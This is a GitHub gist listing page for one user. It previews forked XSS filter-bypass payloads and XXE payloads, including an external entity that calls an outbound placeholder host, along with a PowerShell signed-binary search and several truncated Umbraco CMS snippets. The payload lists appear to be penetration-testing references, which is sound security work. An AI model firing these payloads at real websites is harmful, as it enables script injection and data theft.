Frederik Raabye fraabye
fraabye
/ xxsfilterbypass.lst
Created
May 12, 2020 21:50
— forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
fraabye
/ XXE_payloads
Created
March 31, 2020 08:58
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Gets all Microsoft-signed .exe files below c:\windows | |
| Get-ChildItem C:\windows\ -File -recurse -Force -ErrorVariable FailedItems -ErrorAction SilentlyContinue|Where {$_.extension -eq ".exe" -And {$app = (Get-AuthenticodeSignature $_.FullName); if (![string]::IsNullOrEmpty($app.SignerCertificate.Subject)) {$app.SignerCertificate.Subject.Contains("Microsoft")}}}|Select -Expand Fullname |
fraabye
/ AuthUDemo.cs
Created
May 27, 2017 20:09
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //using Our.Umbraco.AuthU.Web.Mvc; | |
| using Our.Umbraco.AuthU.Web.WebApi; | |
| using System.Web.Mvc; | |
| using Umbraco.Web.WebApi; | |
| namespace AuthUDemo.App_Code | |
| { | |
| [OAuth] | |
| public class MembersOnlyController : UmbracoApiController | |
| { |
fraabye
/ Get all form records from an Umbraco Forms form
Created
September 6, 2016 06:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| private static List<Record> GetFormRecords(Guid formGuid) | |
| { | |
| var records = new List<Record>(); | |
| using (var fs = new FormStorage()) | |
| { | |
| var form = fs.GetForm(formGuid); | |
| if (form == null) | |
| { | |
| return null; |
fraabye
/ PushModuleToUmbraco.js
Last active
September 3, 2015 08:35
Load an external directive in Umbraco BackOffice
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // From our.umbraco.org/forum/umbraco-7/developing-umbraco-7-packages/47905-Including-an-angular-module#comment-209557 | |
| var app = angular.module("umbraco"); | |
| //This is my Angular module that I want to inject/require | |
| app.requires.push('tableSort'); |
fraabye
/ UmbracoFormsCurrentRecordSet
Created
June 25, 2015 10:06
Get Umbraco Forms current record data on submit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @if (TempData["umbracoformsform"] != null && TempData["Forms_Current_Record_id"] != null) | |
| { | |
| var currentForm = (Umbraco.Forms.Mvc.Models.FormViewModel) TempData["umbracoformsform"]; | |
| var currentRecordId = TempData["Forms_Current_Record_id"].ToString(); | |
| var recordIdGuid = new Guid(currentRecordId); | |
| var recordSet = Library.GetRecordsFromForm(currentForm.FormId.ToString()); | |
| foreach (dynamic record in recordSet) | |
| { |
fraabye
/ gist:9101724
Created
February 19, 2014 21:13
Simple Umbraco language switcher using the relations api
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @inherits umbraco.MacroEngines.DynamicNodeContext | |
| @using umbraco.cms.businesslogic.relation; | |
| @{ | |
| RelationType relationType = RelationType.GetByAlias("relateDocumentOnCopy"); | |
| IEnumerable<Relation> relations = Relation.GetRelations(Model.Id , relationType); | |
| var relation = relations.First(); | |
| int relationId = relations.First().Parent.Id; | |
| if(relationId == Model.Id) | |
| { |